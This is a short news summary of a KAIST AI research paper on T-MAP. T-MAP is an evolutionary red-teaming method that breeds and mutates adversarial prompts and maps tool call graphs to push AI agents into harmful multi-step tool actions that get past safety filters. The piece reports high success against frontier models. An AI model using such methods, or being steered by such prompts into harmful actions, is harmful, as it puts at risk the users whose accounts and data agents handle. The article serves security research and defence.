New Evolutionary Attack Uncovers Flaws in AI Agents
- •T-MAP uses evolutionary search to find adversarial prompts that trigger harmful tool interactions.
- •The method targets multi-step trajectories to bypass safety filters in autonomous AI agents.
- •Experiments demonstrate high success rates against frontier models including GPT-5.2 and Gemini-3-Pro.
Red-teaming is the practice of testing a system's defenses by simulating an attack, but traditional methods often struggle with modern AI agents. While most security tests focus on stopping a model from saying something harmful, AI agents pose a new risk: they can perform actions by using external tools. A new research paper from KAIST AI introduces T-MAP, a system designed to uncover these hidden dangers by analyzing the "trajectories," or the sequence of steps and tool calls, an AI takes to complete a task.
The innovation lies in T-MAP’s trajectory-aware evolutionary search, which treats the attack process like a biological evolution. It generates a variety of prompts, keeps the ones that successfully trick the model into using tools in unintended ways, and "mutates" them to find even more effective vulnerabilities. By mapping out how one tool call leads to another (a tool call graph), T-MAP identifies pathways that bypass standard safety filters. This method ensures that the AI doesn't just talk about a harmful act but actually attempts to execute it through connected software.
Testing T-MAP against advanced systems like GPT-5.2 and Gemini-3-Pro revealed that even the most sophisticated "frontier models"—the most powerful AI currently available—remain susceptible to these complex, multi-step exploits. As we move toward a world where AI agents manage our calendars, emails, and financial accounts, this research serves as a vital reminder that securing the text is only half the battle; we must also secure the actions these models take in the real world.